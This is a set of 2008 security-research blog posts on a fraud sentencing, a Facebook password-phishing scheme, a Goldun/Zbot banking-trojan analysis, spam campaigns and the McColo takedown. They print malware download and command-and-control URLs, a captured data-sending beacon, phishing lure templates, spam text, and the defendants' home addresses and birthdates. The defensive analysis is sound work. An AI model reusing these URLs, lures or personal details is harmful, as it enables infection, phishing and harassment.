Thursday, November 20, 2008

Igor Klopov sentenced

Its nice to finish a story sometimes, so this brief entry will do that. Back in August 2007, we did a story called How Far Would You Travel for $7 Million describing the undercover sting where Igor Klopov was lured to the United States to be arrested.

Charges were brought against Klopov and described as:

The defendants have been charged with Conspiracy in the Fourth Degree, Grand Larceny in the First Degree, Attempted Grand Larceny in the First Degree, Money Laundering in the First Degree, Attempted Money Laundering in the First Degree, Grand Larceny in the Second Degree, Attempted Grand Larceny in the Second Degree, Money Laundering in the Second Degree, Attempted Money Laundering the in the Second Degree, Grand Larceny in the Third Degree, Attempted Grand Larceny in the Third Degree, Identity Theft in the First Degree, Forgery in the Second Degree, Criminal Possession of a Forged Instrument in the Second Degree, Criminal Possession of Stolen Property in the Fourth Degree and Criminal Possession of Forgery Devices. Money Laundering in the First Degree and Grand Larceny in the First Degree are both a class B felonies which are punishable by up to 25 years in prison.


So, with all those charges, what kind of sentence was actually passed down by New York Supreme Court Justice Gregory Carro?

Three and a half to Ten and a half years. WHAT?!?!?!! 3.5 Years!?!?!?

Apparently sentenced are slashed if you're really, really, really sorry.

The story has been used as a case study even before the sentence was reached, with Assistant District Attorney Jeremy Glickman doing lectures on the case from a Summer Intern "Brown Bag" Lunch to a National White Collar Crimes Summit presentation called Piercing the Iron Cyber Curtain: Case Studies in International Financial Crimes

Choosing victims from the Forbes Magazine 400 Richest People list, Klopov had several successful capers, with the largest being the theft of more than $1 million from a Fidelity Investments account belonging to a Silicon Valley couple, before he got stung going for his biggest case yet.

In his last attempt, the target was Charles Wyly. Wyly, who is George W. Bush's 9th largest "lifetime donor", is best known in computer circles as the guy who sold Sterling Software and Sterling Commerce for $8 Billion back in 2000, but the family has also dealt in Oil and Restaurants, and is currently behind a "Green Electricity" company called GreenMountain. Klopov managed to convince JP Morgan Chase to send a checkbook from Wyly's Home Equity Line of Credit account to Charles Dalton in Houston. Dalton then took the checkbook to the group's forger, Watson, who used it to write a $7 Million check to a gold broker in New York. JP Morgan Chase confirmed the check had not been issued by asking Mr. Wyly about it. The US Secret Service, working with the New Yorkers, managed to convince Klopo to come to the US to pick up the gold in person, which is when he got busted, back in May 2007.

More details about the case, including some other fascinating high end identity theft attmempts, are available from the New York County District Attorney's Office's initial press release, where they describe Klopov recruiting forgers and impersonators on online job sites.


His co-conspirators have all plead guilty:

IGOR KLOPOV, 5/12/83
5 Gospitaly
Moscow, Russia

JAMES DALTON, 3/28/74
517 Northwood Drive
Conroe, Texas

RICHARD HOSKINS, 9/1/78
415 Spring Street
London, Kentucky

WESTLEY WATSON, 10/2/70
8810 Pembroke Avenue
Detroit, Michigan

LEE MONOPOLI, 9/12/66
4200 NW 12th Avenue
Ft. Lauderdale, Florida

Monday, November 17, 2008

Facebook Users Beware

I'm looking into an interesting Facebook phenomenon this morning. Several of my "friends" on Facebook have received messages that look like these:

---

hey did u know your facebook pic was just featured on kchangblab.com

hey has anyone told you ur facebook pic was just featured on srcate.com

hey do u realize your default image is displayed on moreprofilestrade.com

did you know your profile pic is all over brightium.com

has anyone told u ur facebook pic was just featured on gabblemodule.com

---

The question is, "What's causing these posts?" Did these messages really come from their friends? Are they being generated by malware on their friends computers? or has someone compromised their passwords?

While I wait for these friends-of-friends to respond, I thought I would dig in to the domain names in question.

The WHOIS data for each says the domains are owned by

Adam Arzoomanian bulletinpics@gmail.com
375 E Harmon
Las Vegas
NV
89109
US

According to DomainTools.com, bulletinpics@gmail.com has registered 491 different domain names!

On some, the address has an extra line that says:
"The site is a fun prank - the pic is of a monkey"

The phone number Adam uses, 702.922.1911, belongs to Spin Night Club Promotions in Las Vegas, Nevada. That address is across the street from the Hard Rock Hotel, and is used by the "Alexis Park Resort", which is a "Spin Promotion LV Company", Las Vegas' Premiere Upscale Hip Hop Venue. We've also been able to confirm that Adam Arzoomanian is a real person and is really associated with Spin Night Club at Alexis Park. For instance, this story from Las Vegas Weekly:

This new nightclub project is just one of many for Arzoomanian, who will also oversee the Alexis Park’s gaming initiatives, building a casino resort on the two lots behind the current property as well as expanding the suites and villa according to a three- to five-year plan. “This is just the tip of the iceberg for Alexis Park,” says Arzoomanian, who adds that of all the projects in the works, designing Spin is his hobby. At present, no rendering exists for the new club. “It’s in my head.”
(Full Story

The question remains whether the Real Adam knows anything about all of his domains . . . The number listed has a full voicemail box. Using the voicemail directory, we find that there are many many people who use the same voicemail service, including cleaning services, ticket services, hearing aid services, etc.


------
Let's see what other domains we can find for Adam Arzoomanian . . .

azureclub.com
bubbit.com
dinaunit.com
flagtap.com
flaptag.com
flapstate.com
gabient.com
gabize.com
gabload.com
gabmodule.com
gabblemodule.com
lightzoom.com
mdanclub.com
stolenprofiles.com
swapsecretphotos.com
swapsecretprofiles.com
tabmodule.com
tabtoken.com
tabunit.com
ubztoken.com
wackbase.com
wayizer.com

All of those domains (and probably many more) forward to the single domain:

friends-to-friends-only.com (created Oct 8, 2008 on Moniker Online)

which uses a frameset to pull the actual content from:

http://rotating-destination.com/taf/taf.html

(TAF = Tell A Friend)

Rotating Destination is a TuCows registered domain created on September 29, 2008, with "protected" WHOIS information. Compete.com says the site gets 140,000 unique US-based visitors per month, and Quantcast ranks it as the 12,588th most popular site on the Internet.

After the "login" portion (and ask yourself again, WHY would anyone need to ask for a password here?) the action forwards to yet another website:

http://www.this-isnt-personal.com/taf/picmatch.html
We've sent an email link to this blog entry to bulletinpics@gmail.com and are waiting for a response. As mentioned above, we weren't able to leave Adam a voicemail at his listed number, but the people at Alexis Park were much more helpful. Adam is no longer the GM at their resort. I've left a voicemail for their webmaster/computer guy at the resort, and hopefully that will get us somewhere further. It should be enough to get Moniker to "unregister" all the domains, we hope . . .

The site CLAIMS to be a "prank" site, where ultimately your friend sees a picture of a monkey and is supposed to giggle about how funny it is that their profile was said to be a monkey.

Question. Why would someone pay to register 491 different domain names to display a joke picture of a monkey?

Here's the sequence of webpages . . .










At the end there is one more link, inviting you to trick your friends by sending an email like this:


Here's how we recommend you trick your friends with this
harmless prank site. We're pretty sure they will send
you a funny reaction!

Send them an email. Try one of these lines...

did u know ur image is displayed on
do u realize ur photo is featured on
has anyone emailed you to let you know ur pic is all over
ur picture is at

Copy/Paste one of these domains to the end of your message.

stolenprofiles.com
swapsecretphotos.com
swapsecretprofiles.com

For example:

do u realize ur photo is featured on stolenprofiles.com

(Note we rotate these suggestions often to avoid messages
being caught in spam filters even though they are not spam.)

Try sending it through regular email with no subject line.
That is most effective.

Try to avoid social sites like MySpace and FaceBook because
they may block your message or even call you a spammer or
a phisher. These sites don't want you to send friends
to external sites like ours. Regular email is best,
ie. Gmail, AOL, etc.

Have fun!


So what do you think? A prank? or an interesting way to harvest people's passwords? I don't know the answer yet, but it certainly struck me as something worth looking into more deeply.

Best theory at the moment . . . users are known to use the same passwords in multiple locations. Could this be a way of trying to harvest email and/or facebook userid and password pairs?


Note: About six hours after posting this, a friend shared with me that Trend Micro had already blogged about this subject. They found a couple things I didn't see -- including some pop-up messages that I missed because I didn't let the criminal run scripts on my laptop -- and some historical data tying the criminal's email address to a "Captcha" scheme he previously ran. Certainly worth reading if this subject interests you Click here for TrendMicro Blog coverage of this story.

Sunday, November 16, 2008

Enlisting YOUR BANK to steal your identity

In the past month, we've had three spam campaigns which had one thing in common. They all downloaded files from sergej-grienko.com, and they all "injected" additional questions when you visited your REAL BANK's REAL WEBSITE.

What were the three spam campaigns?

The first was a "You have received an eCard" spam with an ecard.zip attachment. We received around 500 copies of the virus in spam messages between October 1st and October 15th.

The second was a "New anjelina jolie sex scandal" spam with a .zip attachment. We received several versions of this spam - nearly 2,000 copies of the virus - between October 15 and October 27th. The files that we received labeled as "anjelina.zip" on October 15th were very similar to the files we received on October 15th for the ecard.zip.

The third run was "Barak Obama sex scandal" spam with a .zip attachment. These were received on November 10th and 11th, with an attachment named "zeland-01.zip". A similarly configured "new scandal anjelina joly" and "New anjelina jolie sex scandal" was also sent on November 10th, containing an attachment called "ecard.zip", despite the fact that the subject and body suggested something else. zeland-01.zip contained a file called "obama_video.exe".


Oct 1 ecard.exe == 69760de6a852ab59fd18a186a871fc98

Oct 15 e-card.exe == 2521120ff95c2cad5c0b7cd724a0dbb0

Oct 17 Anjelina == 9d40e58d4b91df1fdf7afd3b05dba6d6

Oct 27 anjelina_video.exe == da26039cfcf82b7e8ff659b503cbc9ee

Nov 10 obama_video.exe == bf23b74c51673b6958aa2ffeeca36d1c


The website sergej-grienko.com is in Russia and doesn't run Apache or IIS or any other common webserver. Its running a webserver called "nginx" (Pronounced Engine-X). That's a huge negative right there. Many webservers that host malware are using this webserver type.

One of my malware analysis students brought this domain to my attention first on October 31st. He was analyzing the copy of the malware which claimed to be an "anjelina" video which we had received on October 27th. That video made contact to the servers "popokimoki.com", "laureselignac.com", "sergej-grienko.com", and "ulm-haafeulm-haa.com".

The malware downloaded a "substitution" config file for banking sites. This banking configuration file seemed to be the type used by the so-called "Goldun Trojan" has been around FOREVER -- at least since January 2005 according to Symantec and McAfee.

The Trojan is called a "High Threat" by PCTools:
http://www.pctools.com/mrc/infections/id/Trojan.Goldun/

although Symantec calls it "Risk Level 1: Very Low".

What's the difference in the risk ratings? I believe its primarily a difference between how hard it is to notice the infection vs. how unwise you would have to be to open a .zip file attached to an email and then execute the program it contains. So, there is a "Very Low" risk that someone is going to receive a .zip attachment promising to be a sex video, unpack the zip file, and then run the attached executable. The malware is VERY widely detected, which means even if you were foolish enough to do that, there is a really great chance that the virus would be detected at execution time.

The problem comes in that if you actually DO get infected, you are quite likely to have a severe impact in the form of identity theft, and because of the root-kit technologies implemented in this virus, you won't know you are infected because the virus hides itself from common commands.

We'll look at some of the network traffic from the October 27th version of the anjelina_video.exe and the November 11th version of the obama_video.exe.

The anjelina video is detected almost uniformally as being "Zbot"

The Obama video is detected by a host of names, including "Haxdoor", "Goldun", and GoldSpy" -- Haxdoor (eTrust, Ikarus and Microsoft), Goldun (NOD32, Panda, PCTools), and GoldSpy (DrWeb).

However, our experience is that they both contact the same servers and both do mostly the same thing.

When the anjelina_video was executed, it fetched the file:

http://ulm-haafeulm-haa.com/blotch/1010.bin

and made frequent contacts to the site:

http://sergej-grienko.com/e-bolt/data.php

The .bin file sure looked like a Goldun configuration file to me, so we visited Citibank.com, and sure enough, considerable data about where we had just visited, including our OS, browser, screen resolution, and other information, was sent to sergej-grienko.

The commands used a "trackid=" tag to pass an encoded string of information, such as:

GET /e-bolt/data.php?trackid=706172616D3D636D64266C616E673D454E552669643D37343230267368656C6C3D3026736F636B73706F72743D30267665723D392668747470706F72743D3026757074696D656D3D323726757074696D65683D31267569643D5B43363635454438323642364638413346385D HTTP/1.0

which translates to:
param=cmd&lang=ENU&id=7420&shell=0&socksport=0&ver=9&httpport=0&uptimem=27&uptimeh=1&uid=[censored]


While the Anjelina malware fetched a data file

The Obama_video fetched a data file called:

http://sergej-grienko.com/inj/0611nociti.bin

We set up a working theory that the ".bin" file was being named for the data of its creation, European style, so that the "1010.bin" was created October 10th, the "0611nociti.bin" was created on November 6th. This seemed to be confirmed when on November 11th, the file being downloaded switched to "1111.bin".

What was the purpose of the .bin files?

When visiting websites, the ".bin" file was consulted at each URL to determine whether the URL typed in the browser matched a URL pattern in the configuration file. If there was a match, the webpage was then searched, before displaying to the user, to see whether a particular pattern ON THE FETCHED WEBPAGE was found. If that pattern was found, then additional information was inserted into the webpage.

Using the November 11th configuration file, we took "infected vs. clean" screenshots while visiting 32 different banking login pages that were found in the configuration file. In 28 of the cases, the webpage on the infected computer asked the user to provide additional information while logging on.

All of the information provided (and much more data as well) was stored in a keylog recording file, which was periodically sent to the hacker.

Here are some example "Before and After" pictures. The banks that were tested included:

(53) Fifth Third Bank
Bangor
Bank of America
Bank of Hawaii
Bank of the West
BB&T
California Bank
Capital One
Citizens Bank
East West Bank
First American Bank
First American Trust
First Bank
First Business
First Citizens
First Merit Bank
First Niagra Bank
Frost Bank
Huntington Bank
M&T Bank
Metro National Bank
National Bank of Arizona
PNC Bank
Regions Bank
TD Bank North
WAMU
Webster Online

Image clean-up and sizing underway. Full images of all are available by request to law enforcement and qualified researchers as part of the full report on this subject
















Saturday, November 15, 2008

Post McColo Spam - What do we see?

On the evening of November 11th, the McColo network was "de-peered" and lost access to the Internet. Since that time, those who have unfiltered spam sources are seeing a dramatic decrease in spam. At the UAB Spam Data Mine, on November 12th, November 13th, and November 14th, we had our three lightest spam days in the past year, with a three day daily average 65% below the previous 30 day daily average.

A shout out here to the guys at FireEye, who helped document why the Srizbi botnet was not able to come back online. Several people have said "I can't believe the criminals didn't have a backup plan coded into their bot!" Well, it turns out they did, as FireEye documented in their entry "100,000 Srizbi IPs detected in 24 hours". It turns out their were four unregistered domain names coded into the bots. When McColo's shutdown became imminent, someone (not sure right now if it was FireEye) registered the domains before the criminal could. As a result, FireEye is able to watch the Srizbi bots ATTEMPT to contact their backup, but since the criminals don't own those domains, the attempt fails, and the bots sit idle, wondering what to do next.

So what the the OTHER spammers doing in the meantime? Let's look at the spam we received on Thursday, November 13th at the UAB Spam Data Mine.


Its still primarily about pills. 56% of our spam falls into 6 spam groups - not sorted by Botnet, but by the "look and feel" of the spam, its email body, its subject lines, or its website hosting.

20% - My Canadian Pharmacy - Subjects = single word greeting
13% - Canadian Pharmacy - Subjects = price and quantity of pills
8% - Canadian Pharmacy - random mis-spelled words in body
6% - Canadian Pharmacy - MSN Featured Offers spam
6% - Penis Enlargement Patch
3% - Canadian Pharmacy - Hall of Shame

In addition to these there were six other Canadian Pharmacy spam groups, all tiny, a new "BigPRX" enlargement spam, and small campaigns for US Drugs and Canadian Health and Care Mall.

I'll share some details about all of them below.

Besides those, our other "large spam campaigns" are:

5% = Russian Chat Girlfriends and wives . . .
4% = call 1-305-390-0269 to get a diploma . . .

While no other spam groups comprised more than 1% of our spam on this day, I also wanted to note our two biggest malware items of the day:

United Postal Service tracking number malware . . .
Fake airline tickets malware . . .




The largest single campaign still spamming is for "MyCanadian Pharmacy". The My Canadian Pharmacy campaign accounted for 20% of all of our spam on November 13th!

The spam messages only contain a URL. No message of any type.

The only domains in this group were:

tubdyqwenqe.com
wudvospewy.com

The subjects are also extremely simple:

Aloha
Ave
Greeting
Hallo
Hello
Hey
Hi
Regards
Salute




There are at least nine distinct spam templates that are sending us Canadian Pharmacy spam.



13% of our spam comes from a Canadian Pharmacy Template H:

This campaign has spam subject lines which combine a pill name, a price, and a quantity of pills, randomly selected, like these:

$99.95 Viagra 100mg x 30 pills buy now
$129.95 Viagra 100mg x 60 pills price
buy now Viagra (Sildenafil) 100mg x 90 pills $159.95
Price for 50mg x 60 pills $2.00 per pill
etc.

The domain names in this group are:

chicagofamilyhealth.com.es
chinanewmed.com.es
chinatakecare.com.es
christianfamilymed.com.es
christianfamilyx.com.es
christianxshealth.com.es
churchgoodhealth.com.es
cityxsite.com.es
classydoc.com.es
coasttwenty.com
coolroproject.com.es
cooppharmdirect.com.es
cornerpharmshop.com.es
tieprocess.com

The bodies of the emails follow the same template as the subjects . . . a random dose, quantity and price, followed by a URL, such as:

50mg x 60 pills US $ 2.00 Per Pill
http://coasttwenty.com




8% of our spam comes from Canadian Pharmacy Template A:

In this email template, random words are mis-spelled throughout the email, but the basic message is the same:


If you are tired of ovërpaying for meds, and overpaying for visits to the Doctors -

If you need to get the prescriptiõn. fi|led without hassle and iinconvenience -

Here is your solution : the world's most trusted Ïnternett Önlinee Meds Stôre.

Carrying þopular meds at incredibly low príces, suchh as

- Magic Blue pill (from just $ 1) Via and Cia
- Soma (for your päin relïef) - from just $ 0.60
- Tramadol (for your pãin relief) - justt $ 2
- And thoûsands more differentt meds for all conditions

Recommendêd by Canadiann Health cãrè Professionals and by thousänds of satisfied cùstomers world wide

http://krnnlkb.cn


This template uses the domain names:

luwucos.cn
rrgsahe.cn
czassqz.cn
uoqorks.cn
djmoloq.cn
xzbuagd.cn
wvzupin.cn

and the subject lines:

0nline Discount Pharmacy
A Licensed drug store, best meds online
Advantages of online pharmacies
Affordable Meds
Amazing and cheap online pharm
Best Pharmacy is dedicated to being your best resource for
buy cheap pharm drugs
Cheap Meds from USA
Compare and Save on Generic Meds ! Valium @ $25. Xanax
Convenient, discreet online pharmacy
Discount Internet Pharmacy - FREE Prescriptions Written
Drugs for confidents! Great offers
Find your medication in our internet Pharmacy
Forget the doctor, get meds online
Fw: Meds. Online, Valiu0m, Xana0x, Viagr0 and many more
Fwd: Get All Meds. Any Meds You Want Prescripts Written
Fwd: Order Anti-depressants, weight loss meds
Fwd: special meds for you
Internet Pharmacy - Cheap Prices
Licensed online pharmacy! Best prices
Look for 50% discounts on meds
Looking for Meds? Cheapest Pharm is Here
Meds approved by us approved doctors. Pnterm.in, Va|l|ium
New Internet Pharmacy
Offshore pharmacy, save huge on meds!
Online Pharmacy - Viagra, Xenical & More - Lowest
Online Pharmacy with all your prescription
Order Meds Direct NOW
Pharmacy - No doctor visits
Pharmacy - No prescription required
Save $$$ with our Internet Pharmacy
Save on Generic Meds! Xanax # $35. Valium
This low pricing on meds provided on our site.
Thousands of customers, meds online
Unbelievable Savings on Generic Meds!! Valium @ $25. Xanax
Verified You Ordered Meds
Want your love back?? Check it out
You can order Anti-depressants, weight loss meds,and pain



3% of emails were from Canadian Pharmacy Group B uses different emails which look like this:


What's your HALL of SHAME?

The fast way to solve your most embarassing aiments. Humiliating? Yes. Depressive? Yep. What to do? Visit our site for the most effective solution.

Top female problems and how to solve them.

If you ever been suffering from most known male problems and could not find a good soluion, or dont't like with your present results, visit our site to get the most up-to-date information on problems and the ways to treat them.

Make your way here & Save Today! http://www.legacywhen.com


Domains in this group are:

legacywhen.com
progressfast.com

Subjects in this group are:

10 secrets to good family night life.
7 intimate Relationship Problems and How to Solve Them
Dont let your tiny male problem grow into a disaster.
Dont turn your marriage into disaster, use male enhancers.
How to solve your everyday male problems
How to solve your marriage problems with enhancers.
If your wife became cold, light the fire in her again with female enhancers.
If your wife needs your attention, you can help her anytime.
IT is the modern, fastest and safest way to solve all your male problems.
Looking for ways to solve male, financial and family problems?
Secret to young-looking skin.
Solutions For Embarrassing Male Troubles.
Time to move to next level in your enhancing process.
Top males problems and ways to avoid and cure them.
You search for perfect xxxlife is over.



6% of our spam on November 13th was from spam templates which pretended to be an "MSN Featured Offer". There are actually several different spam sending patterns in this group, but each have this text in common:


About this mailing:
You are receiving this e-mail because you subscribed to MSN Featured Offers. Microsoft respects your privacy. If you do not wish to receive this MSN Featured Offers e-mail, please click the "Unsubscribe" link below. This will not unsubscribe you from e-mail communications from third-party advertisers that may appear in MSN Feature Offers. This shall not constitute an offer by MSN. MSN shall not be responsible or liable for the advertisers' content nor any of the goods or service advertised. Prices and item availability subject to change without notice.

©2008 Microsoft | Unsubscribe | More Newsletters | Privacy

Microsoft Corporation, One Microsoft Way, Redmond, WA 98052


Despite a group of "financially oriented" subject lines, most of these spam messages still redirect to Canadian Pharmacy.

More than 60 domain names are used by this group:

advocacyquick.com
alsocondition.com
aspirationcall.com
bazuuvq.cn
beatwhich.com
betweeninterest.com
brotherstay.com
centuryfrom.com
controlwhile.com
coolorgan.com
cornwit.com
couragemine.com
creaseverb.com
dayriver.com
doesonly.com
enoughdress.com
enoughimagine.com
evyulig.cn
feltnotice.com
gatherwife.com
grewselect.com
gtnnubu.cn
happinessverb.com
holdbottom.com
iceeast.com
imaginecool.com
ingenuitysmile.com
integrityhappy.com
integritywash.com
integrityweek.com
longhundred.com
magnetrecord.com
marketdiffer.com
methodprosperity.com
motivationwhy.com
mountainsaid.com
ofbowly.cn
omoogci.cn
pamaohv.cn
pathreply.com
persongenerosity.com
pleaseturn.com
progresssecond.com
quietboth.com
realizationcame.com
reciprocityhigh.com
redanger.com
servebody.com
severalmix.com
spellhim.com
spiritualityplanet.com
stationexperience.com
teethmotivation.com
thoughjoin.com
townaspiration.com
townimagine.com
txzbjwt.cn
untiltradition.com
usualnumeral.com
valleyyes.com
varythey.com
whatnumeral.com
windtoward.com
writewonder.com

Three distinct subject groups are using this pattern, but all currently point to Canadian Pharmacy websites, including the financial group with subjects like:

/Accounts banker!/
/Annual credit/
/Bank report/
/Credit report/
/Economic report/
etc.

A second group of subjects has more than a hundred full sentence subjects, such as:

RE: A completely natural way to give up smoking.
RE: A new source of life power has been discovered!
RE: A pimple?two pimples?three pimples? They do not leave you? Repulse them!
RE: A pimply guy attracts negative attention? don?t be one of them!
RE: A portable mortar for any disease you might catch.
RE: A single pill may bring out the beast in her!
RE: A single pill raises the immunity a dozen times!
RE: Additional help in building body of your dream.
RE: Afraid of epilepsy? Seizures are not thread anymore.
RE: Almost all men after 40 suffer from it
RE: Amoxicillin. A word that scares bacterial infections.
RE: Annoyed by the new car of a friend? Take a debilitant and buy a better car!
RE: Are you afraid of traveling by plane? Try new reliable medicine!
RE: Bare no morning after headaches in the morning.
RE: Be sure to get enough Zinc for your organism work.
RE: Be the boss in the game. Control your ejaculation.
RE: Become a sophisticated perfume shell adore your talent!
RE: Bring your senses to new level using lubrication.
...
RE: You are growing bald? Here is the answer!
RE: You are the one to set up the rules for that game.
RE: You are young and strong but helpless in bed? There is a way out!
RE: You shouldn?t suffer when the remedy is available!
RE: You sweat all the time? Lose some weight!
RE: You would look awesome without those extra kilos!
RE: Youll appreciate the new antibiotic at its true value!
RE: Your doctor prescribed you a medicine but you dont know where to buy it?


While a third group of subjects has two letters, followed by a Doctor's name, such as:

RE: bw.Doctor Nelson
RE: ja.Doctor Otto
RE: kc.Doctor Lyle
RE: kq.Doctor Emory
RE: kv.Doctor Josue
RE: lb.Doctor Darren



The Penis Enlargement Patch spam uses the following subject lines:

Amazing growth in just weeks
Bring her to seventh heaven
Don't settle for less than 9 inches
Easiest way to gain mass
Endorsed by healthcare professionals worldwide
Enlarge, Widen and Strengthen
Explode her mind with pleasure
Gaining inches the easy way
Grow thicker, harder and longer
Make her desire you
Make her moan with pleasure
Make your friends envious
Power up your package
Proven to enlarge and lengthen
Put on inches instantly
Re: Breakthrough formula for men
Re: don't wait to be huge
Re: Rock hard and huge
Re: watch her come over and over again
Sharon loved the results I got from this
The only formula for men that works
The secret to making her come
The truth behind 9 inches
The ultimate male package
What every woman wants from their man

The websites used by Penis Enlargement Patch are:

http://aafkgina.cn/
http://agolate.com/
http://agolate.net/
http://ahtaffc.cn/
http://bebolgf.cn/
http://cajlobs.cn/
http://cajpirx.cn/
http://fepolai.com/
http://fnicrami.cn/
http://ftebgao.cn/
http://grazilp.com/
http://grazilp.net/
http://grptice.cn/
http://hlidona.com/
http://hligeob.net/
http://kojpige.net/
http://laeicyo.cn/
http://locterb.cn/
http://oehfikal.cn/
http://omridek.com/
http://omridek.net/
http://rvoninnq.cn/
http://sedojji.cn/
http://sertiku.net/
http://uspebuo.net/
http://vseunik.net/

Like one of the Canadian Pharmacy groups, the email body uses randomly inserted mis-spellings to try to avoid spam filters. Here's an example:

A top team of British scientists and medical dõctors have wórked to deveIop the statee-of-the-art Peñis Enlargemeent Patch delivery system which automatically increases penis sizee up to 3-4 fulll inches.

The patches are the eàsieèst and most effectïve way to inçréase your penis size.

You won't have to take pills, get under the knifee to perform exþensivê and very painful surgêrÿ, use any pumps or other devices.

http://agolate.net/

No one wïlll evér find out that you are using our product.

Just aåpply one patçh on your body and wear it for 3 dayss and you will startt noticing dramatic résults.

MiIlions of men are taking advantage of thiss rèvolutionary new produçt - Don't be Ieft bëhind!

http://agolate.net/

Wednesday, November 12, 2008

Unprecedented Drop in Spam

Would you like to know exactly what time the peering providers for McColo pulled the plug? Its not hard to tell if you watch spam volumes. Brian Krebs, from the Washington Post, has been using his most excellent blog Security Fix to lead a public awareness crusade against some of the dirtiest Internet Landfills on the web. His journalistic efforts lead to the breakup of the Russian Business Networks, the closing of InterCage, the ICANN order against EstDomains, and most recently, the closing (at least for now) of McColo.

We know that in the long term such actions might be nothing more than turning on the light -- the roaches scatter, but resume their business somewhere else. The point is to set an example which, if enough people follow after it, will continue to bring inconvenience and expense to the spammers no matter where they resume their operations.

But for the moment, let's celebrate the possibly temporary drop in spam.

This morning at the UAB Spam Data Mine our spam volumes are decreased from normal volumes by between 65% and 70%! What happened? And can we make any generalizations from today's events?

Very little, if any, spam is actually sent from McColo. Why the shutdown of the McColo network had such a profound impact on spam is that the "Command & Control" servers for many of the world's largest spam-sending botnets resided at McColo. This exercise has shown what we have been arguing all along at UAB -- it is important to find out not just what TYPE of spam is being sent, but HOW it is being sent. I have to say I am even more excited than before about identifying the points of control for some of these other spam-sending botnets.



By isolating the McColo network (the proper term is "de-peering"), the Criminal can no longer update the server where the Botnet machines received their commands. If the bots can't find their controller, they complete their current task, and sit idle, testing from time to time to see if they can reach their Command & Control server. Until they can, they won't have any more spam to send.


Let's look at the immediate impact today of the spam-sending roaches who have been inconvenienced by the McColo shutdown.

There are several places that provide real-time or near real-time graphs of the volume of spam they are seeing. Let's look at a few of them.


(click for current MxLogic Threat Level)

MxLogic.com has been showing spam to be between 83.5% and 91.1% of spam for the past week. Yesterday between 1:00 and 4:00 spam dropped from 85% of their monitored mail volume to 71.93%. Currently they are seeing spam as being 64.1% of their email traffic, which I believe would be the lowest point for the entire year.


(click for current SpamCop Statistics)

SpamCop.net normally sees as many as 30 or 40 spam messages per second, and looked at more than 14 million spam emails in the past week. Yesterday spam dropped abruptly from 30 messages per second to around 8 messages per second, and currently spam volumes have not yet crossed the 15 message per second mark for the entire day.

Brian Krebs has updated his earlier post with news that he is receiving feedback from all around the globe of people who are seeing less spam today because of the disconnection of McColo.

If you have numbers or charts showing your own spam drop, please share them with me. I'd love to share them with our readers here: gar@cis.uab.edu

Internet Landfill: McColo Corporation

Brian Krebs has turned his sights on another Internet Landfill, this time the McColo Corporation. Today his column is titled: Major Source of Online Scams and Spams Knocked Offline. Later this morning, the Washington Post ran a longer story on the topic, Major Source of Internet Spam Yanked Offline: Web Hosting Firm Shuttered After Connection to Spammers is Exposed He mentions in the column that he has been researching McColo for several months, and that when he contacted McColo's upstream providers, Global Crossings and Hurricane Electric, that something interesting happened.

Hurricane Electric's Benny Ng told Krebs:

"We looked into it a bit, saw the size and scope of the problem you were reporting and said 'Holy cow! Within the hour we had terminated all of our connections to them."

Although Global Crossings declined to give Krebs a comment, apparently Krebs has once more accomplished what the entire rest of the security world has been unable to do -- removing another Internet Landfill from the world wide web.

I coined the term "Internet Landfill" in a presentation regarding Krebs earlier amazing work almost single-handedly removing Intercage from the Internet. I explained it by saying:

Every house has a trash can, and every business has a dumpster. There's a little garbage anywhere you look. But when someone buys the land in your neighborhood and decides to make it a garbage dump, or a landfill, usually the citizens in that neighborhood protest. Some places on the Internet, such as Intercage, exist solely to store filth, malware, and crime. Those places should be treated like "Internet Landfills", and their neighbors should rise up and protest their presence in their neighborhood.


In case anyone has a question about what type of organization McColo is, here is a little fact-finding adventure, using the excellent Reverse IP Tools from DomainTools.com, and the ASN information from CIDR-Report.

McColo's Autonomous System Number is AS26780.

At this time, Hurricane Electric is no longer listed as an upstream, but Global Crossing *IS* still showing a listing, connecting AS3549 (GBLX) to AS26780(MCCOLO).

The Netblocks currently published as being at McColo are:

208.66.192.0/22
208.72.168.0/21

All their other netblocks are strangely missing.

(See: http://www.cidr-report.org/cgi-bin/as-report?as=as26780)

All of McColo's "Business" webpages were on the server 208.66.192.100. That IP resolved McColo.biz, .com, .info, .net, and .org.

None of those domain names are currently resolving.


Moving through their Class C addresses . . .




208.66.193.* previously had four major domains:

proxyspy.biz
audiobookss.com
authorstore.org
gente.ru

None of those domain names are currently resolving.




208.66.194.* previously had 94 domain names. Just choosing from a few . . .

bestincestfamily dot com (registered at ESTDomains)
bestincestmovies dot com (registered at ESTDomains)
cheapincestpics dot com (registered at ESTDomains)
eliteincestsite dot com (registered at ESTDomains)
teenincestpics dot com (registered at ESTDomains)

None of those domain names are currently resolving.




208.66.195.* previously had domain names. Again, just choosing a few...

protect-access dot com (registered at ESTDomains)
downloadcopy dot com (registered at ESTDomains)
pantyhosefiesta dot com
wm-chance dot net

The pantyhose sites have been moved already to "Sago Networks, LLC".
WM-chance has also been moved to Sago (November 12th) but is not yet operational in its new location. Its a Russian language online lottery winning site. Some of the other sites in this group show signs of being "in the process" of moving.




207.72.168.* previously had 1,183 domain names. Again, just choosing a few...

Megacaptcha dot biz (registered at EstDomains)
CaptchaToMoney dot biz (registered at EstDomains)
Torrentpump dot com (registered at Directi)
FtvInnocentAngels dot net (registered at EstDomains)
Coastal-health dot com (registered at OnlineNIC, Inc)
Canadianpharmacycorp1 dot com (registered at Xin Net)
Canadianpharmacycorp2 dot com
Canadianpharmacycorp3 dot com
Canadianpharmacycorp4 dot com
(through 10)
Onlinepharmacysolutions-a dot com (registered at Directi)
Onlinepharmacysolutions-b dot com
Onlinepharmacysolutions-c dot com
Onlinepharmacysolutions-d dot com
Rxmania dot com (registered at GoDaddy)
Pay4pills dot com (registered at GoDaddy)
Asc-antispyware dot com (registered at Beijing Innovative)
A-pennystock dot com (registered at GoDaddy)
Incest-rape dot com (registered at GoDaddy)
Little-gays dot com (registered at EstDomains)
Allyoungmovies dot com (registered at EstDomains)
Smallpussy dot name (registered at EstDomains)(*1)
nymphets dot name (registered at EstDomains)
LittleCuties dot name (registered at EstDomains)

*1 - received 19,317 visitors per month according to Compete.com

None of the sites in this group are currently resolving.




208.72.169.* had 118 domains registered.

Angelgirlspic.com
Searchportalsite.com

Emailru.info
Emailrus.info
Mailfreedom4u.net
Mailblogal.info
Quickmailbox.info
Ruslandmail.info

DomainsUAgroups dot com

and some NOTORIOUS nameserver domains, which are said to belong to Leo Kuvayev, such as:

Jioketinjdesapionkderunjsa.com
Kedfinhderionkadesunpas.com
Vertunhandesikolasderun.com

None of the sites in this group are currently resolving.




208.72.170.* has 22 domain names, including:

cinema4free dot com
